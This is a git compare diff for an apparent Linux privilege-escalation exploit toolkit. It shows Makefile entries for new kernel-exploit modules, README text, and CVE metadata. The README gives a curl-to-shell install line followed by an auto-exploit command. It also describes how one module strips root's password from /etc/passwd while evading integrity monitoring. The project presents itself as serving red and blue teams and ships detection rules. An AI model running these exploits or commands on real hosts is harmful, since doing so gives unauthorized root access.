Compare commits
33 Commits
60579f1602
...
v0.10.0
| Author | SHA1 | Date | |
|---|---|---|---|
| e3aa70f208 | |||
| 56f9e4d0dc | |||
| af01d112a5 | |||
| 73c7d09445 | |||
| 65588599ff | |||
| 68dac6c063 | |||
| 678a37b2f5 | |||
| 82ba6e0d08 | |||
| 635f7d2d24 | |||
| 1bdbe011b0 | |||
| cd9bea6399 | |||
| 6960d2076d | |||
| 70972e0c9d | |||
| 6edf78f765 | |||
| 3edad37184 | |||
| 58b44ebc43 | |||
| e01aa99ec6 | |||
| 8c45b2beb8 | |||
| 59cc2be065 | |||
| 24b839eccf | |||
| c55adc1840 | |||
| 5c18b678a5 | |||
| e46a32f11e | |||
| d466fbfdcb | |||
| a8bc81c54c | |||
| b7027a1749 | |||
| 03324c8542 | |||
| 95589e26cb | |||
| 4d0a0e2443 | |||
| 050731396d | |||
| ada56b0db3 | |||
| 28a9289989 | |||
| e457b22c1f |
@@ -107,11 +107,32 @@ CRA_DIR := modules/cgroup_release_agent_cve_2022_0492
|
||||
CRA_SRCS := $(CRA_DIR)/skeletonkey_modules.c
|
||||
CRA_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CRA_SRCS))
|
||||
|
||||
# Family: overlayfs_setuid (CVE-2023-0386) — joins overlayfs family
|
||||
# Family: overlayfs_setuid (CVE-2023-0386) — joins overlayfs family.
|
||||
# The exploit needs a FUSE filesystem to export a setuid-root lower layer;
|
||||
# autodetected via `pkg-config fuse3` (or fuse2). When absent, the module
|
||||
# compiles as a stub that returns PRECOND_FAIL with a hint to install the
|
||||
# libfuse3-dev (or libfuse-dev) package and rebuild.
|
||||
OSU_DIR := modules/overlayfs_setuid_cve_2023_0386
|
||||
OSU_SRCS := $(OSU_DIR)/skeletonkey_modules.c
|
||||
OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS))
|
||||
|
||||
# Prefer fuse2 — the public CVE-2023-0386 PoC uses it, and overlay copy-up's
|
||||
# splice path works cleanly through libfuse2's read_buf; libfuse3's read_buf
|
||||
# path returns ENOSYS at copy-up on the kernels tested. Fall back to fuse3.
|
||||
OSU_FUSE2_OK := $(shell pkg-config --exists fuse 2>/dev/null && echo 1 || echo 0)
|
||||
OSU_FUSE3_OK := $(shell pkg-config --exists fuse3 2>/dev/null && echo 1 || echo 0)
|
||||
ifeq ($(OSU_FUSE2_OK),1)
|
||||
OSU_CFLAGS := $(shell pkg-config --cflags fuse) -DOVLSU_HAVE_FUSE
|
||||
OSU_LIBS := $(shell pkg-config --libs fuse)
|
||||
else ifeq ($(OSU_FUSE3_OK),1)
|
||||
OSU_CFLAGS := $(shell pkg-config --cflags fuse3) -DOVLSU_HAVE_FUSE -DOVLSU_FUSE3
|
||||
OSU_LIBS := $(shell pkg-config --libs fuse3)
|
||||
else
|
||||
OSU_CFLAGS :=
|
||||
OSU_LIBS :=
|
||||
endif
|
||||
$(OSU_OBJS): CFLAGS += $(OSU_CFLAGS)
|
||||
|
||||
# Family: nft_set_uaf (CVE-2023-32233)
|
||||
NSU_DIR := modules/nft_set_uaf_cve_2023_32233
|
||||
NSU_SRCS := $(NSU_DIR)/skeletonkey_modules.c
|
||||
@@ -232,6 +253,31 @@ SUH_DIR := modules/sudo_host_cve_2025_32462
|
||||
SUH_SRCS := $(SUH_DIR)/skeletonkey_modules.c
|
||||
SUH_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(SUH_SRCS))
|
||||
|
||||
# CVE-2026-46243 CIFSwitch — cifs.spnego userspace-forged key trust (Asim Manizada)
|
||||
CIW_DIR := modules/cifswitch_cve_2026_46243
|
||||
CIW_SRCS := $(CIW_DIR)/skeletonkey_modules.c
|
||||
CIW_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CIW_SRCS))
|
||||
|
||||
# CVE-2026-23111 nft_catchall — nf_tables nft_map_catchall_activate abort UAF (FuzzingLabs repro)
|
||||
NCA_DIR := modules/nft_catchall_cve_2026_23111
|
||||
NCA_SRCS := $(NCA_DIR)/skeletonkey_modules.c
|
||||
NCA_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NCA_SRCS))
|
||||
|
||||
# CVE-2026-46242 bad_epoll — epoll ep_remove-vs-__fput teardown race UAF ("Bad Epoll", J-jaeyoung kernelCTF)
|
||||
BEP_DIR := modules/bad_epoll_cve_2026_46242
|
||||
BEP_SRCS := $(BEP_DIR)/skeletonkey_modules.c
|
||||
BEP_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(BEP_SRCS))
|
||||
|
||||
# CVE-2026-43499 ghostlock — rtmutex/futex requeue-PI remove_waiter() stack UAF ("GhostLock", VEGA / Nebula Security)
|
||||
GHL_DIR := modules/ghostlock_cve_2026_43499
|
||||
GHL_SRCS := $(GHL_DIR)/skeletonkey_modules.c
|
||||
GHL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(GHL_SRCS))
|
||||
|
||||
# CVE-2026-64600 refluxfs — XFS reflink CoW ILOCK-cycling TOCTOU race ("RefluXFS", Qualys TRU)
|
||||
RFX_DIR := modules/refluxfs_cve_2026_64600
|
||||
RFX_SRCS := $(RFX_DIR)/skeletonkey_modules.c
|
||||
RFX_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(RFX_SRCS))
|
||||
|
||||
# Top-level dispatcher
|
||||
TOP_OBJ := $(BUILD)/skeletonkey.o
|
||||
|
||||
@@ -245,7 +291,8 @@ MODULE_OBJS := $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) \
|
||||
$(DDC_OBJS) $(FGN_OBJS) $(P2TR_OBJS) \
|
||||
$(SCHW_OBJS) $(UDB_OBJS) $(PTH_OBJS) \
|
||||
$(MUT_OBJS) $(SRN_OBJS) $(TIO_OBJS) $(VSK_OBJS) $(PIP_OBJS) \
|
||||
$(PPF_OBJS) $(SUH_OBJS)
|
||||
$(PPF_OBJS) $(SUH_OBJS) $(CIW_OBJS) $(NCA_OBJS) $(BEP_OBJS) \
|
||||
$(GHL_OBJS) $(RFX_OBJS)
|
||||
|
||||
ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(REGISTRY_ALL_OBJ) $(MODULE_OBJS)
|
||||
|
||||
@@ -273,10 +320,10 @@ TEST_KR_ALL_OBJS := $(TEST_KR_OBJS) $(CORE_OBJS)
|
||||
all: $(BIN)
|
||||
|
||||
$(BIN): $(ALL_OBJS)
|
||||
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
|
||||
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS) $(OSU_LIBS)
|
||||
|
||||
$(TEST_BIN): $(TEST_ALL_OBJS)
|
||||
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS)
|
||||
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ -lpthread $(P2TR_LIBS) $(OSU_LIBS)
|
||||
|
||||
$(TEST_KR_BIN): $(TEST_KR_ALL_OBJS)
|
||||
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
|
||||
|
||||
@@ -2,16 +2,19 @@
|
||||
|
||||
[](https://github.com/KaraZajac/SKELETONKEY/releases/latest)
|
||||
[](LICENSE)
|
||||
[](docs/VERIFICATIONS.jsonl)
|
||||
[](docs/VERIFICATIONS.jsonl)
|
||||
[](docs/EXPLOITED.md)
|
||||
[](#)
|
||||
|
||||
> **One curated binary. 41 Linux LPE modules covering 36 CVEs from 2016 → 2026.
|
||||
> Every year 2016 → 2026 covered. 28 confirmed end-to-end against real Linux
|
||||
> VMs via `tools/verify-vm/`. Detection rules in the box. One command picks
|
||||
> the safest one and runs it.**
|
||||
> **One curated binary. 46 Linux LPE modules covering 41 CVEs from 2016 → 2026.
|
||||
> Every year 2016 → 2026 covered. 31 of the 41 CVEs confirmed against real Linux
|
||||
> VMs via `tools/verify-vm/` — and **11 modules confirmed landing `uid=0`
|
||||
> out-of-band** (an independent root proof, never self-report). Detection rules
|
||||
> in the box. One command picks the safest one and runs it.**
|
||||
|
||||
```bash
|
||||
curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
|
||||
&& export PATH="$HOME/.local/bin:$PATH" \
|
||||
&& skeletonkey --auto --i-know
|
||||
```
|
||||
|
||||
@@ -44,54 +47,75 @@ for every CVE in the bundle — same project for red and blue teams.
|
||||
|
||||
## Corpus at a glance
|
||||
|
||||
**41 modules covering 36 distinct CVEs** across the 2016 → 2026 LPE
|
||||
timeline. **28 of the 36 CVEs have been empirically verified** in real
|
||||
Linux VMs via `tools/verify-vm/`; the 8 still-pending entries are
|
||||
**46 modules covering 41 distinct CVEs** across the 2016 → 2026 LPE
|
||||
timeline. **31 of the 41 CVEs have been empirically verified** in real
|
||||
Linux VMs via `tools/verify-vm/`; the 10 still-pending entries are
|
||||
blocked by their target environment (legacy hypervisor, EOL kernel, or
|
||||
the t64-transition libc rollout) or are brand-new additions awaiting a
|
||||
VM sweep, not by missing code.
|
||||
|
||||
**Verified end-to-end (uid=0):** beyond confirming each `detect()` verdict,
|
||||
**11 modules have been run to a real root shell in a VM and witnessed
|
||||
out-of-band** — a root-owned artifact, an `/etc/shadow` read, or a setuid-bash
|
||||
sentinel, never the module's own self-report. The full ledger (targets, method,
|
||||
and the four false-`EXPLOIT_OK` bugs this surfaced and fixed) is in
|
||||
[`docs/EXPLOITED.md`](docs/EXPLOITED.md).
|
||||
|
||||
| Tier | Count | What it means |
|
||||
|---|---|---|
|
||||
| 🟢 Full chain | **14** | Lands root (or its canonical capability) end-to-end. No per-kernel offsets needed. |
|
||||
| 🟡 Primitive | **14** | Fires the kernel primitive + grooms the slab + records a witness. Default returns `EXPLOIT_FAIL` honestly. Pass `--full-chain` to engage the shared `modprobe_path` finisher (needs offsets — see [`docs/OFFSETS.md`](docs/OFFSETS.md)). |
|
||||
| 🟢 Full chain | **16** | Lands root (or its canonical capability) end-to-end. No per-kernel offsets needed. |
|
||||
| 🟡 Primitive | **13** | Fires the kernel primitive + grooms the slab + records a witness. Default returns `EXPLOIT_FAIL` honestly. Pass `--full-chain` to engage the shared `modprobe_path` finisher (needs offsets — see [`docs/OFFSETS.md`](docs/OFFSETS.md)). |
|
||||
|
||||
**🟢 Modules that land root on a vulnerable host:**
|
||||
copy_fail family ×5 · dirty_pipe · dirty_cow · pwnkit · overlayfs
|
||||
(CVE-2021-3493) · overlayfs_setuid (CVE-2023-0386) ·
|
||||
cgroup_release_agent · ptrace_traceme · sudoedit_editor · entrybleed
|
||||
(KASLR leak primitive)
|
||||
cgroup_release_agent · ptrace_traceme · sudoedit_editor ·
|
||||
sudo_samedit (CVE-2021-3156, Baron Samedit) · entrybleed
|
||||
(KASLR leak primitive) · refluxfs (CVE-2026-64600, `--full-chain`:
|
||||
`/etc/passwd` root pop on a private-extent XFS target)
|
||||
|
||||
**🟡 Modules with opt-in `--full-chain`:**
|
||||
af_packet · af_packet2 · af_unix_gc · cls_route4 · fuse_legacy ·
|
||||
nf_tables · nft_set_uaf · nft_fwd_dup · nft_payload ·
|
||||
netfilter_xtcompat · stackrot · sudo_samedit · sequoia · vmwgfx
|
||||
netfilter_xtcompat · stackrot · sequoia · vmwgfx
|
||||
|
||||
### Empirical verification (28 of 36 CVEs)
|
||||
### Empirical verification (31 of 41 CVEs)
|
||||
|
||||
Records in [`docs/VERIFICATIONS.jsonl`](docs/VERIFICATIONS.jsonl) prove
|
||||
each verdict against a known-target VM. Coverage:
|
||||
each verdict against a known-target VM; **bold** modules were additionally run
|
||||
to a real root shell and witnessed out-of-band (see [`docs/EXPLOITED.md`](docs/EXPLOITED.md)).
|
||||
Coverage:
|
||||
|
||||
| Distro / kernel | Modules verified |
|
||||
|---|---|
|
||||
| Ubuntu 18.04 (4.15.0, sudo 1.8.21p2) | af_packet · ptrace_traceme · sudo_samedit · sudo_runas_neg1 |
|
||||
| Ubuntu 20.04 (5.4.0-26 pinned + 5.15 HWE) | af_packet2 · cls_route4 · nft_payload · overlayfs · pwnkit · sequoia · tioscpgrp |
|
||||
| Ubuntu 22.04 (5.15 stock + mainline 5.15.5 / 6.1.10 / 6.19.7) | af_unix_gc · dirty_pipe · dirtydecrypt · entrybleed · nf_tables · nft_set_uaf · nft_pipapo · overlayfs_setuid · stackrot · sudoedit_editor · sudo_chwoot |
|
||||
| Ubuntu 18.04 (4.15.0, sudo 1.8.21p2) | af_packet · **ptrace_traceme** · **sudo_samedit** · **sudo_runas_neg1** |
|
||||
| Ubuntu 20.04 (5.4.0-26 pinned + 5.15 HWE) | af_packet2 · cls_route4 · nft_payload · **overlayfs** · **pwnkit** · sequoia · tioscpgrp |
|
||||
| Ubuntu 22.04 (5.15 stock + mainline 5.15.5 / 6.1.10 / 6.19.7) | af_unix_gc · dirtydecrypt · entrybleed · nf_tables · nft_set_uaf · nft_pipapo · **overlayfs_setuid** · stackrot · **sudoedit_editor** · sudo_chwoot · **sudo_host** |
|
||||
| mainline (dirty_pipe on 5.16.0, dirty_cow on 4.8.0) | **dirty_pipe** · **dirty_cow** |
|
||||
| Debian 11 (5.10 stock) | cgroup_release_agent · fuse_legacy · netfilter_xtcompat · nft_fwd_dup |
|
||||
| Debian 12 (6.1 stock + udisks2 / polkit allow rule) | pack2theroot · udisks_libblockdev |
|
||||
| Rocky Linux 9.8 (5.14.0-687.10.1.el9_8.0.1, stock XFS + `reflink=1`) | **refluxfs** |
|
||||
|
||||
**Not yet verified (8):** `vmwgfx` (VMware-guest-only — no public Vagrant
|
||||
box), `dirty_cow` (needs ≤ 4.4 kernel — older than every supported box),
|
||||
`mutagen_astronomy` (mainline 4.14.70 kernel-panics on Ubuntu 18.04
|
||||
**Not yet verified (10):** `vmwgfx` (VMware-guest-only — no public Vagrant
|
||||
box), `mutagen_astronomy` (mainline 4.14.70 kernel-panics on Ubuntu 18.04
|
||||
rootfs — needs CentOS 6 / Debian 7), `pintheft` & `vsock_uaf` (kernel
|
||||
modules not loaded on common Vagrant boxes), `fragnesia` (mainline 7.0.5
|
||||
kernel .debs depend on the t64-transition libs from Ubuntu 24.04+/Debian
|
||||
13+; no Parallels-supported box has those yet), `ptrace_pidfd` (brand-new
|
||||
2026-05 Qualys disclosure — added this cycle, VM sweep pending), `sudo_host`
|
||||
(brand-new 2025-06 Stratascale disclosure — added this cycle, VM sweep
|
||||
pending). All eight are flagged in
|
||||
2026-05 Qualys disclosure — added this cycle, VM sweep pending),
|
||||
`cifswitch` (detect + `add_key` primitive VM-verified; full chain
|
||||
+ patched-kernel discriminator pending), `nft_catchall` (reconstructed
|
||||
kernel-UAF trigger, not VM-verified), `bad_epoll` (reconstructed epoll
|
||||
race trigger — deliberately under-driven, not VM-verified), `ghostlock`
|
||||
(reconstructed rtmutex/futex-PI stack-UAF trigger — deliberately
|
||||
under-driven, not VM-verified). All ten are
|
||||
flagged in
|
||||
[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml) with rationale.
|
||||
|
||||
(`dirty_cow` and `sudo_host` were on this list last release; both are now
|
||||
VM-verified — `dirty_cow` run to root on a provisioned mainline 4.8.0 kernel,
|
||||
`sudo_host` on Ubuntu 22.04 with a host-scoped sudoers rule.)
|
||||
|
||||
See [`CVES.md`](CVES.md) for per-module CVE, kernel range, and
|
||||
detection status. Run `skeletonkey --module-info <name>` for the
|
||||
embedded verification records per module.
|
||||
@@ -136,7 +160,7 @@ uid=1000(kara) gid=1000(kara) groups=1000(kara)
|
||||
$ skeletonkey --auto --i-know
|
||||
[*] auto: host=demo distro=ubuntu/24.04 kernel=5.15.0-56-generic arch=x86_64
|
||||
[*] auto: active probes enabled — brief /tmp file touches and fork-isolated namespace probes
|
||||
[*] auto: scanning 41 modules for vulnerabilities...
|
||||
[*] auto: scanning 45 modules for vulnerabilities...
|
||||
[+] auto: dirty_pipe VULNERABLE (safety rank 90)
|
||||
[+] auto: cgroup_release_agent VULNERABLE (safety rank 98)
|
||||
[+] auto: pwnkit VULNERABLE (safety rank 100)
|
||||
@@ -205,10 +229,54 @@ also compile (modules with Linux-only headers stub out gracefully).
|
||||
|
||||
## Status
|
||||
|
||||
**v0.9.8 cut 2026-06-02.** 41 modules across 36 CVEs — **every
|
||||
year 2016 → 2026 now covered**. Newest: `ptrace_pidfd` (CVE-2026-46333,
|
||||
Qualys's `__ptrace_may_access` / `pidfd_getfd` credential-steal) and
|
||||
`sudo_host` (CVE-2025-32462, Stratascale's sudo `--host` policy bypass).
|
||||
**v0.10.0 cut 2026-07-24 — the exploit-verification release.** The corpus
|
||||
moved from *detect*-verified to **out-of-band exploit-verified**: **11 modules
|
||||
now confirmed landing `uid=0` in a VM**, each witnessed independently (a
|
||||
root-owned artifact / `/etc/shadow` read / setuid-bash sentinel) rather than
|
||||
self-reported. Along the way, **four modules that falsely reported `EXPLOIT_OK`
|
||||
without ever getting root were fixed** (`pwnkit`, `ptrace_traceme`, `dirty_pipe`,
|
||||
`dirty_cow`), and a full false-`EXPLOIT_OK` audit was closed — every success
|
||||
claim is now backed by a real out-of-band check. See `docs/EXPLOITED.md`.
|
||||
46 modules across 41 CVEs — **every year 2016 → 2026 now covered**. Newest
|
||||
module: `refluxfs` (CVE-2026-64600,
|
||||
Qualys TRU's "RefluXFS" — a nine-year TOCTOU race in the XFS **reflink
|
||||
copy-on-write** path: `xfs_reflink_fill_cow_hole()` drops `ILOCK` to wait
|
||||
for transaction log space, then re-checks the refcount btree at a
|
||||
**stale** physical block without re-reading the data fork, so a
|
||||
direct-I/O writer treats a still-shared block as private and writes to it
|
||||
in place. The primitive is an arbitrary overwrite of the **on-disk
|
||||
contents of any readable file** — data, not memory corruption — so there
|
||||
are **no offsets, no ROP, no KASLR/SMEP/SMAP** to defeat, and SELinux
|
||||
enforcing, containers and seccomp are all irrelevant. Because the
|
||||
victim's inode is never written, its `mtime`/`ctime`/size never change
|
||||
and **file-integrity monitoring cannot see it**. Unprivileged, no userns,
|
||||
no crafted image — reachable wherever an XFS volume is mounted
|
||||
`reflink=1`, the installer default on RHEL/CentOS/Rocky/Alma/Oracle 8-10,
|
||||
Fedora Server ≥ 31 and Amazon Linux 2023. **🟢 VM-verified full chain**:
|
||||
`--exploit refluxfs --i-know --full-chain` reflink-clones `/etc/passwd`,
|
||||
races the CoW window, strips root's password on-disk and returns
|
||||
`EXPLOIT_OK` (`su root`, empty password → uid 0) — confirmed on Rocky 9.8,
|
||||
every other account preserved, backed up + restorable. One caveat found
|
||||
in testing: the target's extent must be **private** going in (an
|
||||
already-shared file isn't attackable; normal `useradd`/`passwd` churn
|
||||
makes it private). Plain `--exploit` runs only a safe own-files trigger),
|
||||
`ghostlock` (CVE-2026-43499,
|
||||
VEGA / Nebula Security's "GhostLock" — a ~15-year rtmutex/futex requeue-PI
|
||||
use-after-free on **kernel stack** memory where `remove_waiter()` clears
|
||||
`pi_blocked_on` on the wrong task during the `-EDEADLK` deadlock-rollback,
|
||||
raced by a sibling-CPU `sched_setattr()` priority walk; reachable by **any
|
||||
unprivileged user with no user namespace**; VEGA / Nebula kernelCTF public
|
||||
PoC ($92k, ~97% stable) — shipped as a deliberately under-driven,
|
||||
reconstructed trigger anchored on a safe `-EDEADLK` reachability witness
|
||||
with the corpus's lowest `--auto` safety rank), `bad_epoll` (CVE-2026-46242,
|
||||
Jaeyoung Chung's "Bad Epoll" — a race UAF in `fs/eventpoll.c` reachable by
|
||||
any unprivileged user with no user namespace; kernelCTF public PoC),
|
||||
`nft_catchall` (CVE-2026-23111, the nf_tables `nft_map_catchall_activate`
|
||||
abort-path UAF — an inverted condition frees a chain still referenced by a
|
||||
catch-all GOTO map element; public reproduction by FuzzingLabs), and
|
||||
`cifswitch` (CVE-2026-46243, Asim Manizada's "CIFSwitch" — the
|
||||
`cifs.spnego` key type trusts userspace-forged authority fields, coercing
|
||||
the root `cifs.upcall` helper into loading an attacker NSS module as root).
|
||||
v0.9.0 added 5 gap-fillers
|
||||
(`mutagen_astronomy` / `sudo_runas_neg1` / `tioscpgrp` / `vsock_uaf` /
|
||||
`nft_pipapo`); v0.8.0 added 3 (`sudo_chwoot` / `udisks_libblockdev` /
|
||||
@@ -216,42 +284,52 @@ v0.9.0 added 5 gap-fillers
|
||||
the verified count from 22 → 28 by booting real vulnerable kernels
|
||||
(Ubuntu mainline 5.4.0-26, 5.15.5, 6.19.7 + provisioner-built sudo
|
||||
1.9.16p1 + Debian 12 + polkit allow rule for udisks).
|
||||
**28 empirically verified** against real Linux VMs (Ubuntu 18.04 /
|
||||
20.04 / 22.04 + Debian 11 / 12 + mainline kernels from
|
||||
kernel.ubuntu.com). 88-test unit harness + ASan/UBSan + clang-tidy on
|
||||
every push. 4 prebuilt binaries (x86_64 + arm64, each in dynamic +
|
||||
static-musl flavors).
|
||||
**v0.10.0 is the exploit-verification release**: **31 empirically verified**
|
||||
against real Linux VMs (Ubuntu 18.04 / 20.04 / 22.04 + Debian 11 / 12 + Rocky
|
||||
Linux 9.8 + mainline kernels from kernel.ubuntu.com), and **11 modules run to a
|
||||
real root shell and witnessed out-of-band** — which also surfaced and fixed
|
||||
four modules that had been falsely reporting `EXPLOIT_OK` without ever getting
|
||||
root (see [`docs/EXPLOITED.md`](docs/EXPLOITED.md)). 148-test unit harness +
|
||||
ASan/UBSan + clang-tidy on every push. 4 prebuilt binaries (x86_64 + arm64,
|
||||
each in dynamic + static-musl flavors).
|
||||
|
||||
Reliability + accuracy work in v0.7.x:
|
||||
- Shared **host fingerprint** (`core/host.{h,c}`) populated once at
|
||||
startup — kernel/distro/userns gates/sudo+polkit versions — exposed
|
||||
to every module via `ctx->host`.
|
||||
- **Test harness** (`tests/`, `make test`) — 88 tests: 33 kernel_range
|
||||
unit tests + 55 detect() integration tests over mocked host
|
||||
- **Test harness** (`tests/`, `make test`) — 148 tests: 33 kernel_range
|
||||
unit tests + 115 detect() integration tests over mocked host
|
||||
fingerprints. Runs in CI on every push.
|
||||
- **VM verifier** (`tools/verify-vm/`) — Vagrant + Parallels scaffold
|
||||
that boots known-vulnerable kernels (stock distro + mainline via
|
||||
kernel.ubuntu.com), runs `--explain --active` per module, records
|
||||
match/MISMATCH/PRECOND_FAIL as JSON. 28 modules confirmed end-to-end.
|
||||
match/MISMATCH/PRECOND_FAIL as JSON. 31 of 41 CVEs confirmed; **11
|
||||
modules additionally run to a real root shell and witnessed out-of-band**
|
||||
(`docs/EXPLOITED.md`).
|
||||
- **`--explain <module>`** — single-page operator briefing: CVE / CWE
|
||||
/ MITRE ATT&CK / CISA KEV status, host fingerprint, live detect()
|
||||
trace, OPSEC footprint, detection-rule coverage, verified-on
|
||||
records. Paste-into-ticket ready.
|
||||
- **CVE metadata pipeline** (`tools/refresh-cve-metadata.py`) — fetches
|
||||
CISA KEV catalog + NVD CWE; 12 of 34 modules cover KEV-listed CVEs.
|
||||
CISA KEV catalog + NVD CWE; 13 of 41 modules cover KEV-listed CVEs.
|
||||
- **151 detection rules** across auditd / sigma / yara / falco; one
|
||||
command exports the corpus to your SIEM.
|
||||
- `--auto` upgrades: per-detect 15s timeout, fork-isolated detect +
|
||||
exploit, structured verdict table, scan summary, `--dry-run`.
|
||||
|
||||
Not yet verified (8 of 36 CVEs): `vmwgfx` (VMware-guest only),
|
||||
`dirty_cow` (needs ≤ 4.4 kernel), `mutagen_astronomy` (mainline
|
||||
4.14.70 panics on Ubuntu 18.04 rootfs — needs CentOS 6 / Debian 7),
|
||||
`pintheft` + `vsock_uaf` (kernel modules not autoloaded on common
|
||||
Vagrant boxes), `fragnesia` (mainline 7.0.5 .debs need t64-transition
|
||||
libs from Ubuntu 24.04+ / Debian 13+), `ptrace_pidfd` + `sudo_host`
|
||||
(brand-new this cycle, sweep pending). Rationale in
|
||||
Not yet verified (10 of 41 CVEs): `vmwgfx` (VMware-guest only),
|
||||
`mutagen_astronomy` (mainline 4.14.70 panics on Ubuntu 18.04 rootfs —
|
||||
needs CentOS 6 / Debian 7), `pintheft` + `vsock_uaf` (kernel modules not
|
||||
autoloaded on common Vagrant boxes), `fragnesia` (mainline 7.0.5 .debs
|
||||
need t64-transition libs from Ubuntu 24.04+ / Debian 13+), `ptrace_pidfd`
|
||||
+ `cifswitch` (cifswitch detect + primitive VM-verified; full chain
|
||||
pending) + `nft_catchall` (reconstructed kernel-UAF trigger, not
|
||||
VM-verified) + `bad_epoll` (reconstructed epoll race trigger,
|
||||
deliberately under-driven, not VM-verified) + `ghostlock` (reconstructed
|
||||
rtmutex/futex-PI stack-UAF trigger, deliberately under-driven, not
|
||||
VM-verified). Rationale in
|
||||
[`tools/verify-vm/targets.yaml`](tools/verify-vm/targets.yaml).
|
||||
(`dirty_cow` and `sudo_host` graduated to VM-verified this release.)
|
||||
|
||||
See [`ROADMAP.md`](ROADMAP.md) for the next planned modules and
|
||||
infrastructure work.
|
||||
|
||||
+50
-5
@@ -121,8 +121,8 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
.cwe = "CWE-287",
|
||||
.attack_technique = "T1611",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
.in_kev = true,
|
||||
.kev_date_added = "2026-06-02",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2022-0847",
|
||||
@@ -236,6 +236,14 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2025-32462",
|
||||
.cwe = "CWE-863",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2025-32463",
|
||||
.cwe = "CWE-829",
|
||||
@@ -252,6 +260,14 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-23111",
|
||||
.cwe = "CWE-416",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-31635",
|
||||
.cwe = "CWE-130",
|
||||
@@ -276,6 +292,30 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-43499",
|
||||
.cwe = "CWE-416",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46242",
|
||||
.cwe = "CWE-416",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46243",
|
||||
.cwe = "CWE-20",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46300",
|
||||
.cwe = "CWE-787",
|
||||
@@ -286,15 +326,20 @@ const struct cve_metadata cve_metadata_table[] = {
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2026-46333",
|
||||
.cwe = NULL,
|
||||
.cwe = "CWE-269",
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
.kev_date_added = "",
|
||||
},
|
||||
{
|
||||
.cve = "CVE-2025-32462",
|
||||
.cwe = "CWE-863",
|
||||
/* NVD had published no CWE for this CVE at time of writing
|
||||
* (disclosed 2026-07-22); SKELETONKEY's own reading is CWE-362
|
||||
* (race) yielding CWE-367 (TOCTOU) — see the module MODULE.md.
|
||||
* This field mirrors NVD, so it stays NULL until NVD classifies
|
||||
* it and the refresh script fills it in. */
|
||||
.cve = "CVE-2026-64600",
|
||||
.cwe = NULL,
|
||||
.attack_technique = "T1068",
|
||||
.attack_subtechnique = NULL,
|
||||
.in_kev = false,
|
||||
|
||||
+13
-3
@@ -212,10 +212,20 @@ static int parse_symfile(const char *path,
|
||||
fclose(f);
|
||||
|
||||
/* /proc/kallsyms returns all-zero addrs under kptr_restrict — treat
|
||||
* that as "couldn't read", not "actually zero". */
|
||||
* that as "couldn't read", not "actually zero". Undo ONLY the bogus
|
||||
* KALLSYMS source tags this pass may have set on still-zero fields —
|
||||
* do NOT clobber values a higher-priority source (env vars) already
|
||||
* provided, or the env override is silently wiped on any kptr_restrict
|
||||
* host (which is every default host). */
|
||||
if (!saw_nonzero) {
|
||||
o->modprobe_path = o->poweroff_cmd = o->init_task = o->init_cred = 0;
|
||||
o->source_modprobe = o->source_init_task = OFFSETS_NONE;
|
||||
if (o->source_modprobe == OFFSETS_FROM_KALLSYMS) {
|
||||
o->modprobe_path = 0;
|
||||
o->source_modprobe = OFFSETS_NONE;
|
||||
}
|
||||
if (o->source_init_task == OFFSETS_FROM_KALLSYMS) {
|
||||
o->init_task = 0;
|
||||
o->source_init_task = OFFSETS_NONE;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
return filled;
|
||||
|
||||
@@ -57,6 +57,11 @@ void skeletonkey_register_vsock_uaf(void);
|
||||
void skeletonkey_register_nft_pipapo(void);
|
||||
void skeletonkey_register_ptrace_pidfd(void);
|
||||
void skeletonkey_register_sudo_host(void);
|
||||
void skeletonkey_register_cifswitch(void);
|
||||
void skeletonkey_register_nft_catchall(void);
|
||||
void skeletonkey_register_bad_epoll(void);
|
||||
